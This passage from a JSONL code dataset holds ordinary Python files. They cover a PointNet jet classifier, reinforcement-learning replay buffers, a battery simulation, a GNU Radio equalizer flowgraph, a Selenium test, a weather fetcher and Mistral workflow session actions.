self.total_len]\n self.ent=[num_piece*sample_len for sample_len in self.total_len]\n self.test=False\n def on_epoch_end(self):\n self.index = np.arange(sum(self.total_len)) # data index list\n self.choice_p=[1.*sample_len/sum(self.total_len) for sample_len in self.total_len]\n self.begin=[0]*self.num_classes\n self.ent=[0]*self.num_classes\n self.test=False\n #if self.shuffle == True:\n # np.random.shuffle(self.index)\n def GetEntry(pick,entry):\n self.data[pick].GetEntry(entry)\n def get_test(self, verbose=False):\n self.test=True\n Xout,Yout= self.__get_data(sum(self.total_len),verbose)\n self.on_epoch_end()\n return Xout, Yout\n\n def __get_data(self, batch_size,verbose=False):\n X=[]\n Y=[]\n pick=0\n num_data=0\n #now=datetime.datetime.now() \n for i in range(batch_size):\n if(verbose):print(i)\n if(self.test==True):\n if(pick==self.num_classes):\n break\n else:\n pick=np.random.choice(self.num_classes,p=self.choice_p) # 0 background 1 signal\n num_data+=1\n self.data[pick].GetEntry(self.ent[pick])\n if(self.data_form==0):\n X.append([array(\"f\",self.data[pick].image_ecor_s),array(\"f\",self.data[pick].image_ecor_c),array(\"i\",self.data[pick].image_n_s),array(\"i\",self.data[pick].image_n_c)])\n if(self.data_form==1):\n X.append([array(\"f\",self.data[pick].voxel_ecor_s),array(\"i\",self.data[pick].voxel_n_s)])\n if(self.data_form==2):\n points=[]#phi eta depth s c \n point_len=len(self.data[pick].fiber_depth)\n if(0):\n for j in range(self.num_point):\n if(j 0)\n jittered_data = np.clip(sigma * np.random.randn(B, N, C), -1 * clip, clip)\n jittered_data += batch_data\n return jittered_data\n\nclass OrthogonalRegularizer(keras.regularizers.Regularizer):\n def __init__(self, num_features, l2reg=0.001):\n self.num_features = num_features\n self.l2reg = l2reg\n self.eye = tf.eye(num_features)\n\n def __call__(self, x):\n x = tf.reshape(x, (-1, self.num_features, self.num_features))\n xxt = tf.tensordot(x, x, axes=(2, 2))\n xxt = tf.reshape(xxt, (-1, self.num_features, self.num_features))\n return tf.reduce_sum(self.l2reg * tf.square(xxt - self.eye))\n\ndef tblock(g,channel,feat=64,loop=2,num_point=2048,activation=\"relu\"):\n x=g\n for i in range(loop):\n x=Convolution1D(feat,1,activation=activation,data_format='channels_last')(x)\n x=BatchNormalization()(x)\n x=MaxPooling1D(pool_size=num_point,data_format='channels_last')(x)\n for i in range(loop):\n x=Dense(feat,activation=activation)(x)\n x=BatchNormalization()(x)\n bias=keras.initializers.Constant(np.eye(channel).flatten())\n #reg = OrthogonalRegularizer(channel)\n #x=Dense(channel*channel,kernel_initializer=\"zeros\",bias_initializer=bias,activity_regularizer=reg)(x)\n x=Dense(channel*channel,kernel_initializer=\"zeros\",bias_initializer=bias)(x)\n #x=Dense(channel*channel,weights=[np.zeros([feat,channel*channel]),np.eye(channel).flatten().astype(np.float32)])(x)\n T=Reshape((channel,channel))(x)\n return Dot(axes=(2, 1))([g, T])\n #return mat_mul(g,T)\n\ndef pointmodel(num_point=2048,channel=4,num_classes=2,peak=0,stride=['label'],network=\"0\",add_var=0,trial=None,activation=\"relu\"):\n \n # define optimizer\n \n input_points = Input(shape=(num_point,channel ))#\n if(network==\"opt\"):\n numfeat=trial.suggest_categorical(\"num_feat\",[16,64,128])\n chfeat=trial.suggest_categorical(\"ch_feat\",[8,16,64])\n numloop=trial.suggest_categorical(\"num_loop\",[1,2,3])\n m = BatchNormalization()(input_points)#\n if(network==\"0\"):\n numfeat=64\n chfeat=16\n numloop=1\n if(network==\"1\"):\n numfeat=128\n chfeat=64\n numloop=1\n if(network==\"2\"):\n numfeat=64\n chfeat=16\n numloop=2\n if(network==\"3\"):\n numfeat=128\n chfeat=16\n numloop=1\n g=tblock(m,channel=channel,feat=numfeat,loop=numloop,num_point=num_point,activation=activation)\n g = Convolution1D(chfeat, 1, input_shape=(num_point, channel), activation=activation,data_format='channels_last')(g)#\n g = BatchNormalization()(g)#\n \n g=tblock(g,channel=chfeat,feat=numfeat,loop=numloop,num_point=num_point,activation=activation)\n \n #g = Convolution1D(512, 1, activation=activation,data_format='channels_last')(g)\n #g = BatchNormalization()(g)\n #global_feature = Flatten()(MaxPooling1D(pool_size=num_point,data_format='channels_last')(g))#if use maxpooling many features needed\n g = Convolution1D(numfeat, 1, activation=activation,data_format='channels_last')(g)\n g = BatchNormalization()(g)\n g = Convolution1D(2, 1, activation=activation,data_format='channels_first')(g)\n g = BatchNormalization()(g)\n global_feature = Flatten()(g)\n #g = Convolution1D(512, 1, activation=activation,data_format='channels_last')(g)\n #g = BatchNormalization()(g)\n \n # global_feature\n \n # point_net_cls\n #c = Dense(256, activation=activation)(global_feature)#\n #c = BatchNormalization()(c)#\n #c= Dropout(rate=0.7)(c)\n #c = Dense(256, activation=activation)(c)#2 validation increase\n #c = BatchNormalization()(c)#2 0.63\n #c= Dropout(rate=0.7)(c)\n #c = Dense(num_classes, activation='softmax',name=\"output1\")(c)#\n if(add_var>0):\n input_vars = Input(shape=(add_var))\n v=BatchNormalization()(input_vars)\n global_feature=Concatenate()([global_feature,v])\n\n #if(peak==0):\n # c = Dense(num_classes, activation='softmax',name=\"output0\")(global_feature)#\n c=[]\n #c = Dense(1, activation='linear',name=\"output1\")(global_feature)#\n for i in stride:\n if(i==\"label\" or i==0):\n c.append(Dense(num_classes, activation='softmax',name=\"output{}\".format(i))(global_feature))#\n else:\n c.append(Dense(1,activation='linear',name=\"output{}\".format(i))(global_feature))\n # --------------------------------------------------end of pointnet\n \n # print the model summary\n #model = Model(inputs=input_points, outputs=prediction)\n if(add_var>0):\n return Model(inputs=[input_points,input_vars], outputs=c)\n else:\n return Model(inputs=input_points, outputs=c)\n\ndef attentionmodel(num_point=2048,channel=4,num_classes=2,peak=0,stride=['label'],network=\"0\",add_var=0,trial=None,activation=\"relu\"):\n \n \n input_points = Input(shape=(num_point,channel ))#\n m = BatchNormalization()(input_points)#\n if(network==\"2\"):\n numfeat=64\n chfeat=16\n numloop=2\n g=tblock(m,channel=channel,feat=numfeat,loop=numloop,num_point=num_point,activation=activation)\n g = Convolution1D(chfeat, 1, input_shape=(num_point, channel), activation=activation,data_format='channels_last')(g)#\n g = BatchNormalization()(g)#\n \n g=tblock(g,channel=chfeat,feat=numfeat,loop=numloop,num_point=num_point,activation=activation)\n \n #g = Convolution1D(512, 1, activation=activation,data_format='channels_last')(g)\n #g = BatchNormalization()(g)\n #global_feature = Flatten()(MaxPooling1D(pool_size=num_point,data_format='channels_last')(g))#if use maxpooling many features needed\n g = Convolution1D(numfeat, 1, activation=activation,data_format='channels_last')(g)\n g = BatchNormalization()(g)\n g = Convolution1D(2, 1, activation=activation,data_format='channels_first')(g)\n g = BatchNormalization()(g)\n global_feature = Flatten()(g)\n #g = Convolution1D(512, 1, activation=activation,data_format='channels_last')(g)\n #g = BatchNormalization()(g)\n \n # global_feature\n \n # point_net_cls\n #c = Dense(256, activation=activation)(global_feature)#\n #c = BatchNormalization()(c)#\n #c= Dropout(rate=0.7)(c)\n #c = Dense(256, activation=activation)(c)#2 validation increase\n #c = BatchNormalization()(c)#2 0.63\n #c= Dropout(rate=0.7)(c)\n #c = Dense(num_classes, activation='softmax',name=\"output1\")(c)#\n if(add_var>0):\n input_vars = Input(shape=(add_var))\n v=BatchNormalization()(input_vars)\n global_feature=Concatenate()([global_feature,v])\n\n #if(peak==0):\n # c = Dense(num_classes, activation='softmax',name=\"output0\")(global_feature)#\n c=[]\n #c = Dense(1, activation='linear',name=\"output1\")(global_feature)#\n for i in stride:\n if(i==\"label\" or i==0):\n c.append(Dense(num_classes, activation='softmax',name=\"output{}\".format(i))(global_feature))#\n else:\n c.append(Dense(1,activation='linear',name=\"output{}\".format(i))(global_feature))\n # --------------------------------------------------end of pointnet\n \n # print the model summary\n #model = Model(inputs=input_points, outputs=prediction)\n if(add_var>0):\n return Model(inputs=[input_points,input_vars], outputs=c)\n else:\n return Model(inputs=input_points, outputs=c)\n\nif __name__== '__main__':\n #trainchain=[rt.TChain(\"event\"),rt.TChain(\"event\")]\n #for i in range(20):\n # trainchain[0].Add(\"/pad/yulee/geant4/tester/analysis/fast/uJet50GeV_fastsim_{}.root\".format(i))\n # trainchain[1].Add(\"/pad/yulee/geant4/tester/analysis/fast/gJet50GeV_fastsim_{}.root\".format(i))\n #a=DataGenerator(trainchain,data_form=\"point\",batch_size=512)\n #b=a.__getitem__(10)\n #b=a.__getitem__(10)\n #b=a.__getitem__(10)\n path=[\"/pad/yulee/geant4/tester/analysis/fast/uJet50GeV_fastsim_{}.root\",\"/pad/yulee/geant4/tester/analysis/fast/gJet50GeV_fastsim_{}.root\"]\n #np.savez(\"point.npz\",x=x,y=y)\n #print(x.shape,y.shape)\n #print(test.__len__())\n #for i in range(test.__len__()):\n # x,y=test.__getitem__(0)\n","sub_path":"driter.py","file_name":"driter.py","file_ext":"py","file_size_in_byte":17255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"438365160","text":"sayur = ['bayam', 'kangkung', 'wortel', 'selada']\nprint(sayur)\nlagi = 'y'\nwhile lagi == 'y':\n print('Menu : \\nA. Tambah data sayur \\nB. Hapus data sayur \\nC. Tampilkan data sayur')\n pilihan = input('Pilihan Anda : ')\n\n if pilihan == 'A':\n data = input('Masukkan nama sayur yang mau ditambahkan : ')\n sayur.append(data)\n print(data +' berhasil ditambahkan.')\n lagi = input('Ingin kembali ke menu? (y/n): ')\n elif pilihan == 'B':\n data = str(input('Ketikkan nama sayur yang mau dihapus :'))\n try :\n sayur.remove(data)\n print('Sayur berhasil dihapus.')\n except ValueError:\n print('Nama sayur tidak ditemukan.')\n lagi = input('Ingin kembali ke menu? (y/n): ')\n elif pilihan == 'C':\n print('Data Sayur : ', sayur)\n lagi = input('Ingin kembali ke menu? (y/n): ')\n\nprint('Terima Kasih telah menggunakan layanan program ini. \\nSampai Jumpa Lagi!')\n","sub_path":"prak8/project 8-4.py","file_name":"project 8-4.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643198491","text":"#####################################################################\n# A script that demonstrates the implementation experience replay.\n# author: Utkarsh A. Mishra (utkarsh75477@gmail.com)\n#####################################################################\n\nfrom collections import deque\nimport random\nimport numpy as np\n\nclass ReplayBuffer(object):\n\n def __init__(self, buffer_size, random_seed=123):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n random.seed(random_seed)\n\n def add(self, state, action, reward, next_state):\n experience = (state, action, reward, next_state)\n if self.count < self.buffer_size: \n self.buffer.append(experience)\n self.count += 1\n else:\n self.buffer.popleft()\n self.buffer.append(experience)\n\n def size(self):\n return self.count\n\n def sample_batch(self, batch_size):\n batch = []\n\n if self.count < batch_size:\n batch = random.sample(self.buffer, self.count)\n else:\n batch = random.sample(self.buffer, batch_size)\n\n state_batch = np.array([_[0] for _ in batch])\n action_batch = np.array([_[1] for _ in batch])\n reward_batch = np.array([_[2] for _ in batch])\n next_state_batch = np.array([_[3] for _ in batch])\n\n return state_batch, action_batch, reward_batch, next_state_batch\n\n def clear(self):\n self.buffer.clear()\n self.count = 0\n","sub_path":"mbbl/selfsupervision/replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"201241970","text":"import numpy as np\nimport os\nfrom numpy.random import randint\n\n## IndustrialConsumer\n\nclass IndustrialConsumer :\n\n def __init__(self,demand,cost_elec_market):\n self.dt = 0.5\n self.demand = demand\n self.cost_elec_market = cost_elec_market\n self.efficiency = 0.95\n self.battery_max_power = 10\n self.battery_capacity = 100\n self.battery_load = np.zeros(48)\n self.battery = np.zeros(48)\n self.electricity_purchases = np.zeros(48)\n self.load_profile = np.zeros(48)\n self.bill = np.zeros(48)\n self.battery[-1] = 50\n\n#Choice of the quantity of electricity from your battery you want to use to fulfill the demand over the time span [t,t+dt]\n def set_battery_load(self,t,battery_load):\n\n #If the battery isn't full enough to provide such amount of electricity, the latter is set to the maximum amount the battery can provide.\n if ((battery_load/self.efficiency) > self.battery[int((t-1)*2)]):\n print(\"Battery_shortage, battery load set to \",self.efficiency*self.battery[int((t-1)*2)])\n battery_load = self.efficiency*self.battery[int((t-1)*2)]\n\n #If the battery isn't enough powerful, the battery load is set to the battery maximum power.\n if (battery_load > self.battery_max_power):\n print(\"Insufficient battery power, battery load set to battery max power = \",self.battery_max_power)\n battery_load = self.battery_max_power\n\n #If all rules are respected, the amount of electricity from the battery used to meet the demand and the battery level are updated.\n self.battery_load[int(t*2)] = -battery_load\n self.battery[int(t*2)] = self.battery[int((t-1)*2)] - battery_load\n return(True)\n\n\n#Choice of the quantity of electricity you want to buy at time t (a part of the energy is lost because of a non-perfect battery efficiency\n def buy_electricity(self,t,Quantity):\n\n #If the player doesn't buy enough electricity to meet the demand, just enough electricity to do so is purchased.\n if ((Quantity - self.battery_load[int(t*2)]) < self.demand[int(t*2)]):\n print(\"You don't meet the demand, quantity set so that you do : Q = \",self.demand[int(t*2)] + self.battery_load[int(t*2)])\n Quantity = self.demand[int(t*2)] + self.battery_load[int(t*2)]\n\n #If the amount of electricity purchased outgrows the maximum battery capacity, enough electricity to fill up the battery is purchased.\n if ((Quantity - self.demand[int(t*2)])*self.efficiency + self.battery[int(t*2)] > self.battery_capacity):\n print(\"Batterie insuffisante, quantity set to fully fill up your battery : Quantity = \",(self.battery_capacity - self.battery[int(t*2)])/self.efficiency + self.demand[int(t*2)])\n Quantity = (self.battery_capacity - self.battery[int(t*2)])/self.efficiency + self.demand[int(t*2)]\n\n #Update of the battery level and of the electricity purchases.\n self.battery[int(t*2)] += (Quantity - self.demand[int(t*2)])*self.efficiency\n self.electricity_purchases[int(t*2)] = Quantity\n return(True)\n\n#Compute the total load over the time span [t,t+dt].\n def compute_load(self,t):\n self.load_profile[int(t*2)] = self.battery_load[int(t*2)] + self.demand[int(t*2)]\n\n#Compute the current bill.\n # def update_bill(self,t):\n # self.bill[int(t*2)] = self.cost_elec_market[int(t*2)]*self.electricity_purchases[int(t*2)]\n\n\n\n\n\n\n\n\n\n","sub_path":"players/IC.py","file_name":"IC.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"83285011","text":"import os, shutil\nimport csv\nimport random\nfrom collections import namedtuple, deque\n\nimport numpy as np\nimport torch\n\nTransition = namedtuple('Transition', ('state', 'next_state', 'action', 'reward', 'mask'))\n\n\nclass Memory(object):\n def __init__(self, capacity, memory_dir, n_states):\n # self.memory = deque(maxlen=capacity)\n self.capacity = capacity\n self.memory_dir = memory_dir\n self.n_states = n_states\n if os.path.exists(self.memory_dir):\n shutil.rmtree(self.memory_dir)\n os.mkdir(self.memory_dir)\n self.count = 0\n\n def push(self, state, next_state, action, reward, mask):\n ### dequeの機能にappendなのでオーバーしたら最初のほうから消えていく\n # self.memory.append(Transition(state, next_state, action, reward, mask))\n state = self._tensor_to_csv(state)\n next_state = self._tensor_to_csv(next_state)\n action = self._np_to_csv(action)\n reward = str(reward)\n mask = str(mask)\n txt = state + \",next_state,\" + next_state + \",action,\" + action + \",reward,\" + reward + \",mask,\" + mask\n with open(self.memory_dir + \"{0:04d}.csv\".format(self.count), 'w') as f:\n writer = csv.writer(f)\n writer.writerow(txt.split(\",\"))\n self.count += 1\n if self.count >= self.capacity:\n self.count = 0\n\n def _tensor_to_csv(self, tensor):\n tensor = tensor.detach().numpy().reshape((-1)).tolist()\n tensor = [str(x) for x in tensor]\n tensor = \",\".join(tensor)\n return tensor\n\n def _np_to_csv(self, array):\n array = array.reshape((-1)).tolist()\n array = [str(x) for x in array]\n array = \",\".join(array)\n return array\n\n def sample(self, batch_size):\n # transitions = random.sample(self.memory, batch_size)\n # batch = Transition(*zip(*transitions))\n rand_list = np.random.randint(0, self.capacity, [batch_size])\n\n batch = {}\n state_list = np.zeros((batch_size, self.n_states))\n next_state_list = np.zeros((batch_size, self.n_states))\n action_list = np.zeros((batch_size, 2))\n reward_list = np.zeros((batch_size, 1))\n mask_list = np.zeros((batch_size, 1))\n\n for i, rand in enumerate(rand_list):\n with open(self.memory_dir + \"{0:04d}.csv\".format(rand)) as f:\n txt = f.read()\n state, txt = txt.split(\",next_state,\")\n next_state, txt = txt.split(\",action,\")\n action, txt = txt.split(\",reward,\")\n reward, mask = txt.split(\",mask,\")\n state = state.split(\",\")\n next_state = next_state.split(\",\")\n action = action.split(\",\")\n reward = reward.split(\",\")\n mask = mask.split(\",\")\n state_list[i] = np.asarray(state)\n next_state_list[i] = np.asarray(next_state)\n action_list[i] = np.asarray(action)\n reward_list[i] = np.asarray(reward)\n mask_list[i] = np.asarray(mask)\n batch[\"state\"] = torch.from_numpy(state_list.astype(np.float32))\n batch[\"next_state\"] = torch.from_numpy(next_state_list.astype(np.float32))\n batch[\"action\"] = torch.from_numpy(action_list.astype(np.float32))\n batch[\"reward\"] = torch.from_numpy(reward_list.astype(np.float32).reshape((-1)))\n batch[\"mask\"] = torch.from_numpy(mask_list.astype(np.float32).reshape((-1)))\n\n return batch\n\n def __len__(self):\n return len(self.memory)\n","sub_path":"04_cartpole_img_pca/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"262830141","text":"# -*- coding:utf-8 -*-\n\nfrom socket import *\n\nserver_info = ('20.20.20.82', 8080)\n\n\ndef main():\n s = socket()\n s.connect(server_info)\n s.send('hello'.encode('utf-8'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"网络编程/011-tcp客户端.py","file_name":"011-tcp客户端.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"266552484","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n# Copyright 2017 <+YOU OR YOUR COMPANY+>.\n# \n# This is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3, or (at your option)\n# any later version.\n# \n# This software is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this software; see the file COPYING. If not, write to\n# the Free Software Foundation, Inc., 51 Franklin Street,\n# Boston, MA 02110-1301, USA.\n# \nfrom gnuradio import analog\nfrom gnuradio import blocks\nfrom gnuradio import channels\nfrom gnuradio import digital\nfrom gnuradio import filter\nfrom gnuradio import gr\nfrom gnuradio.filter import firdes\nimport numpy\n\n\nclass lms_nonlinear_experiment(gr.top_block):\n def __init__(self,\n snr_db=10,\n num_symbols=1024,\n taps=[]):\n gr.top_block.__init__(self, \"LMS Nonlinear Experiment\")\n\n ##################################################\n # Variables\n ##################################################\n self.snr_db = snr_db\n self.samp_rate = samp_rate = 1000000\n self.num_symbols = num_symbols\n self.taps = taps\n\n self.const = const = digital.constellation_8psk().base()\n\n\n ##################################################\n # Blocks\n ##################################################\n #self.interp_fir_filter_xxx_0_0 = filter.interp_fir_filter_ccc(2, (firdes.low_pass_2(1, 1, .25, .1, 80)))\n #self.interp_fir_filter_xxx_0_0.declare_sample_delay(0)\n self.digital_lms_equalizer_cc_0 = digital.lms_dd_equalizer_cc(4, .01, 2, self.const)\n self.digital_chunks_to_symbols_xx_1 = digital.chunks_to_symbols_bc((const.points()), 1)\n self.blocks_vector_sink_x_0 = blocks.vector_sink_c(1)\n self.blocks_head_0 = blocks.head(gr.sizeof_gr_complex*1, num_symbols)\n self.analog_random_source_x_1 = blocks.vector_source_b(map(int, numpy.random.randint(0, const.arity(), 1000)), True)\n self.blocks_repeat_0 = blocks.repeat(gr.sizeof_gr_complex * 1, 2)\n #self.interp_fir_filter_xxx_1 = filter.interp_fir_filter_ccc(1, (\n #self.taps[0]/ numpy.sqrt((numpy.abs(self.taps[0]) ** 2 + numpy.abs(self.taps[1]) ** 2)),\n #self.taps[1]/ numpy.sqrt((numpy.abs(self.taps[0]) ** 2 + numpy.abs(self.taps[1]) ** 2))))\n self.interp_fir_filter_xxx_1 = filter.interp_fir_filter_ccc(1, self.taps)\n self.blocks_multiply_xx_0 = blocks.multiply_vcc(1)\n self.blocks_add_xx_0 = blocks.add_vcc(1)\n self.analog_const_source_x_0 = analog.sig_source_c(0, analog.GR_CONST_WAVE, 0, 0, .1)\n self.analog_noise_source_x_1 = analog.noise_source_c(analog.GR_GAUSSIAN, 10 ** (-20 / 20) / numpy.sqrt(2), 50)\n ##################################################\n # Connections\n ##################################################\n self.connect((self.analog_random_source_x_1, 0), (self.digital_chunks_to_symbols_xx_1, 0))\n self.connect((self.blocks_head_0, 0), (self.blocks_vector_sink_x_0, 0))\n\n #self.connect((self.digital_chunks_to_symbols_xx_1, 0), (self.interp_fir_filter_xxx_0_0, 0))\n self.connect((self.blocks_add_xx_0, 0), (self.digital_lms_equalizer_cc_0, 0))\n self.connect((self.digital_lms_equalizer_cc_0, 0), (self.blocks_head_0, 0))\n #self.connect((self.interp_fir_filter_xxx_0_0, 0), (self.channels_channel_model_0, 0))\n self.connect((self.blocks_repeat_0, 0), (self.interp_fir_filter_xxx_1, 0))\n self.connect((self.digital_chunks_to_symbols_xx_1, 0), (self.blocks_repeat_0, 0))\n\n\n\n\n self.connect((self.interp_fir_filter_xxx_1, 0), (self.blocks_add_xx_0, 1))\n self.connect((self.analog_noise_source_x_1, 0), (self.blocks_add_xx_0, 0))\n self.connect((self.blocks_multiply_xx_0, 0), (self.blocks_add_xx_0, 2))\n self.connect((self.interp_fir_filter_xxx_1, 0), (self.blocks_multiply_xx_0, 0))\n self.connect((self.interp_fir_filter_xxx_1, 0), (self.blocks_multiply_xx_0, 1))\n self.connect((self.analog_const_source_x_0, 0), (self.blocks_multiply_xx_0, 2))\n\n def get_snr_db(self):\n return self.snr_db\n\n def set_snr_db(self, snr_db):\n self.snr_db = snr_db\n self.channels_channel_model_0.set_noise_voltage(10**(-self.snr_db/20.0)/numpy.sqrt(2))\n\n def get_samp_rate(self):\n return self.samp_rate\n\n def set_samp_rate(self, samp_rate):\n self.samp_rate = samp_rate\n\n def get_num_symbols(self):\n return self.num_symbols\n\n def set_num_symbols(self, num_symbols):\n self.num_symbols = num_symbols\n self.blocks_head_0.set_length(self.num_symbols)\n\n def get_const(self):\n return self.const\n\n def set_const(self, const):\n self.const = const\n","sub_path":"python/lms_nonlinear_experiment.py","file_name":"lms_nonlinear_experiment.py","file_ext":"py","file_size_in_byte":5133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"445373614","text":"import pytest\nfrom selenium.webdriver import DesiredCapabilities\nfrom testcontainers.selenium import BrowserWebDriverContainer\n\n\n@pytest.mark.parametrize(\"caps\", [DesiredCapabilities.CHROME, DesiredCapabilities.FIREFOX])\ndef test_webdriver_container_container(caps):\n chrome = BrowserWebDriverContainer(caps)\n\n with chrome:\n webdriver = chrome.get_driver()\n webdriver.get(\"http://google.com\")\n webdriver.find_element_by_name(\"q\").send_keys(\"Hello\")\n","sub_path":"tests/test_webdriver_container.py","file_name":"test_webdriver_container.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"239743886","text":"# weather.py\n# writen by Jan-Niklas Dihlmann\n# IP location https://ipapi.co/\n# Powered by Dark Sky https://darksky.net/poweredby/\n\nimport json\nimport math\nimport requests\nimport datetime\n\n\nclass Weather(object):\n\n\tdef __init__(self, language, units, key, position):\n\t\tself.key = key\n\t\tself.units = units\n\t\tself.language = language\n\t\tself.position = position\n\t\tself.update()\n\n\tdef update(self):\n\t\tif self.position == None:\n\t\t\tself.set_position()\n\t\t\tif self.position != None:\n\t\t\t\tself.set_weather()\n\t\telse:\n\t\t\tself.set_weather()\n\n\tdef set_position(self):\n\t\ttry:\n\t\t\turl = 'https://ipapi.co/json/'\n\t\t\tresponse = requests.get(url)\n\t\t\tdata = json.loads(response.text)\n\t\t\tself.position = [data['latitude'], data['longitude']]\n\t\texcept Exception:\n\t\t\tself.exception()\n\n\tdef set_weather(self):\n\t\ttry:\n\t\t\turl = 'https://api.darksky.net/forecast/%s/%f,%f' % (self.key, self.position[0], self.position[1])\n\t\t\tparameter = {'lang': self.language, 'units': self.units, 'exclude': ['minutely','daily','alerts']}\n\t\t\tresponse = requests.get(url, params=parameter)\n\t\t\tdata = json.loads(response.text)\n\t\t\thourly = data['hourly']\n\t\t\tcurrently = data['currently']\n\t\t\tself.summary = hourly['summary']\n\t\t\tself.temperature = str(round(currently['temperature'])) + '°'\n\t\texcept Exception:\n\t\t\tself.exception()\n\n\tdef exception(self):\n\t\tdate = datetime.datetime.now().strftime('%H:%M:%S')\n\t\tprint(date + ' WLAN disconnect')\n\t\tself.summary = '--'\n\t\tself.temperature = '--'\n","sub_path":"classes/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"204113548","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport requests\nimport time\nimport traceback\nimport six\nimport json\n\nfrom mistral import exceptions as exc\nfrom mistral.actions.std_actions import NoOpAction\nimport mistral.actions.if_session as ses\nimport mistral.actions.eureka_client as eureka\nfrom mistral.utils import kfk_etypes\nfrom mistral.utils import kfk_trace\nfrom mistral_lib import actions\nfrom oslo_log import log as logging\n\nfrom mie.xlogger.klog import klog\nfrom mie.bprint import varfmt, todict\nimport mie.confcenter\n\nLOG = logging.getLogger(__name__)\nconf = mie.confcenter.getdefcc()\n\n#\n# yihe.Session\n#\nclass Session(NoOpAction):\n '''\n action yihe.Session cmd=Create ...\n '''\n def __init__(self, action_context, cmd, psid=None, sid=None):\n actx = action_context\n klog.d(\" ACTX : \" + str(varfmt(actx)))\n klog.d(\" CMD : \" + str(cmd))\n klog.d(\" PSID : \" + str(psid))\n klog.d(\" SID : \" + str(sid))\n\n self.cmd = cmd\n self.actx = actx\n self.psid = psid\n self.sid = sid\n\n def run(self, context):\n klog.d(\"CMD: \", self.cmd)\n klog.d(varfmt(context))\n if self.cmd == \"create\":\n # Get content information\n # action_execution_id = self.actx.get(\"action_execution_id\")\n # task_id = self.actx.get(\"task_id\")\n # task_name = self.actx.get(\"task_name\")\n workflow_execution_id = self.actx.get(\"workflow_execution_id\")\n # workflow_name = self.actx.get(\"workflow_name\")\n\n sid = self.psid or workflow_execution_id\n # sesCreate return a session ID.\n res = {\n \"content\": ses.sesCreate(sid, workflow_execution_id)\n }\n\n if self.cmd == \"rollback\":\n res = ses.sesRollback(self.sid)\n\n klog.d(varfmt(res))\n return res\n\n def test(self, context):\n return None\n\n\n#\n# yihe.Sync\n#\nclass Sync(actions.Action):\n def orgInit(self,\n url,\n method=\"GET\",\n params=None,\n body=None,\n headers=None,\n cookies=None,\n auth=None,\n timeout=None,\n allow_redirects=None,\n proxies=None,\n verify=None):\n\n if auth and len(auth.split(':')) == 2:\n self.auth = (auth.split(':')[0], auth.split(':')[1])\n else:\n self.auth = auth\n\n if isinstance(headers, dict):\n for key, val in headers.items():\n if isinstance(val, (six.integer_types, float)):\n headers[key] = str(val)\n\n self.url = url\n self.method = method\n self.params = params\n\n if isinstance(body, dict):\n body = json.dumps(body, ensure_ascii=False)\n if body:\n body = body.encode(\"utf-8\")\n self.body = body\n\n self.headers = headers\n self.cookies = cookies\n self.timeout = timeout\n self.allow_redirects = allow_redirects\n self.proxies = proxies\n self.verify = verify\n\n def __init__(self,\n action_context,\n url,\n method=\"GET\",\n params=None,\n body=None,\n atom=None,\n session=None,\n headers=None,\n cookies=None,\n auth=None,\n timeout=None,\n allow_redirects=None,\n proxies=None,\n verify=None):\n self.ts_init_start = time.time()\n klog.d(\"INTO YIHE.SYNC\")\n\n actx = action_context\n\n # 1. Strip the session info\n klog.d(\" URL : \" + str(url))\n klog.d(\"METHOD : \" + str(method))\n klog.d(\" BODY : \" + str(body))\n klog.d(\" HDRS : \" + str(headers))\n klog.d(\" PARAM : \" + str(params))\n klog.d(\" ACTX : \" + str(varfmt(actx)))\n\n # FIXME: how to process the atomID\n self.atom = atom\n self.session = session\n\n sesEna = conf.SES_ENA and session\n hookEna = conf.HOOK\n # klog.d(\"Session or NOT:\", sesEna, \" In config:\", conf.SES_ENA, \" Session Id:\", session)\n\n self.skipRun = False\n\n # Get content information\n self.action_execution_id = actx.get(\"action_execution_id\")\n self.task_id = actx.get(\"task_id\")\n self.task_name = actx.get(\"task_name\")\n self.workflow_execution_id = actx.get(\"workflow_execution_id\")\n self.workflow_name = actx.get(\"workflow_name\")\n\n if hookEna:\n # FIXME: Provide a chance to modify the input and output.\n pass\n\n '''\n\n exid = actx.get(\"action_execution_id\")\n hookInfo = db_get_hook_info(exid)\n if hookInfo:\n self.skipRun = hookInfo.skipRun\n\n self.input = hookInfo.input\n\n # Only once\n db_mark_used(exid)\n\n #\n # Overwrite All the parameters and DO NOT overwrite key\n # parameters\n #\n url = _url or url\n body = _body or body\n '''\n\n # Overwrite the rerun input and/or output\n self.rrInput = self.rrOutput = None\n\n self.ts_ses_start = self.ts_ses_end = 0\n if sesEna:\n klog.d(\"Process session\")\n\n self.ts_ses_start = time.time()\n dic = {\n \"x__sid\": session,\n\n \"url\": url,\n \"method\": method,\n \"body\": body,\n \"headers\": headers,\n \"params\": params,\n \"actx\": actx,\n \"cookies\": cookies,\n \"auth\": auth,\n \"allow_redirects\": 